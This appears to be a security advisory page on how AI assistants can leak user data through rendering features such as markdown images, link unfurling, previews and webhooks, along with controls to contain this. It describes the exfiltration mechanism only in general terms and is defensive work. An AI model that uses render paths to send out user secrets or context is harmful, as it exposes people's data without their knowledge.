How should security teams handle AI assistants that can leak user data through rendering features?

Why This Matters for Security Teams

Rendering features are not cosmetic when an AI assistant can convert content into links, markdown, previews, or embedded requests. That makes the render path an outbound data channel, which can expose user input, session context, or hidden instructions to places the user never intended. This is the same class of problem NHIMG has repeatedly highlighted in non-human identity incidents and secret sprawl: exposure often comes from secondary paths, not the obvious one. The Guide to the Secret Sprawl Challenge is useful here because it shows how data leaks become harder to contain once content is copied, transformed, or redistributed across systems. External guidance is also catching up to this risk, including Anthropic on AI-orchestrated cyber operations, which reinforces how quickly seemingly routine tool use can become a security event.

For security teams, the key mistake is assuming the assistant only needs prompt filtering. If the model can render content that fetches remote assets, expands links, or previews user-provided material, it can leak identifiers, tokens, or sensitive business context through the UI layer itself. In practice, many security teams encounter this only after a rendered snippet has already exfiltrated data through a preview, webhook, or link expansion path, rather than through intentional testing.

How It Works in Practice

The safest operating model is to treat rendering as a controlled egress function. Every feature that turns text into something executable or retrievable should be mapped, reviewed, and restricted before deployment. That includes markdown rendering, inline image resolution, link unfurling, file previews, and any client-side component that can make a network call. The AI assistant should not be allowed to “helpfully” transform user input into an outbound request without policy checks at the moment of action.

Current guidance suggests three control layers:

Sanitise output before render so user-controlled content cannot create active content, hidden links, or unexpected fetches.

Restrict outbound requests from previews and renders to allowlisted domains and minimal metadata.

Log and review render events separately from chat transcripts so security teams can detect data movement through the UI path.

For NHI governance, this is a workload identity problem as much as a UI problem. An assistant that can render content should be constrained by the same least-privilege expectations used for other NHI security practices. In environments with autonomous tool use, security teams should prefer policy enforcement at request time over static rules, because the assistant’s behaviour can change with prompt context, retrieved data, or chained actions. The most defensible pattern is to combine content controls with explicit approval for any render path that could expose secrets, user data, or internal links, aligned with the lessons in The 52 NHI Breaches Report and the broader risk patterns in NHI incidents. These controls tend to break down when rendering is handled by third-party plugins or browser-side widgets because the assistant loses direct visibility into what the render engine actually fetches.

Common Variations and Edge Cases

Tighter rendering controls often increase friction for product teams, requiring organisations to balance user experience against the risk of silent data disclosure. That tradeoff is especially sharp in assistants that support rich previews, code blocks, embedded media, or multi-turn collaboration, where users expect the interface to “do more” with the content they provide.

There is no universal standard for this yet, but current guidance suggests treating the highest-risk cases differently:

Markdown and HTML rendering should default to a safe subset, with scripts, remote embeds, and auto-expanding links disabled.

Image and document previews should be isolated from production credentials and blocked from fetching untrusted remote resources.

Any assistant that can summarise or transform sensitive content should be tested for prompt injection plus render-layer leakage, not just model output quality.

Teams should also watch for indirect leakage through “helpful” enrichment features such as link previews, citation cards, and source extraction. Those features can unintentionally surface query terms, document names, or internal hostnames that were never meant to leave the session. Where the assistant interacts with external content, the risk profile starts to resemble the secret-sprawl and visibility gaps documented in the State of Secrets in AppSec research. Best practice is evolving, but the practical rule is simple: if rendering can initiate network activity, it must be governed like an outbound integration, not treated as a harmless presentation layer.

Standards & Framework Alignment

This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.

OWASP Agentic AI Top 10 and CSA MAESTRO address the attack and risk surface, while NIST AI RMF set the governance and control requirements practitioners need to meet.

Framework	Control / Reference	Relevance
OWASP Agentic AI Top 10	N/A	Rendering paths can become agentic exfiltration channels.
CSA MAESTRO	N/A	Covers governance for autonomous tool use and data leakage paths.
NIST AI RMF		Risk management must include AI-driven data disclosure through rendering.

Constrain assistant render and tool actions with request-time checks and safe output handling.

#1 Authority in NHI Education, Research and Advisory, empowering organizations to tackle the critical risks posed by Non-Human Identities (NHIs), including AI Agents.

How should security teams handle AI assistants that can leak user data through rendering features?

Why This Matters for Security Teams

How It Works in Practice

Common Variations and Edge Cases

Standards & Framework Alignment

Related resources from NHI Mgmt Group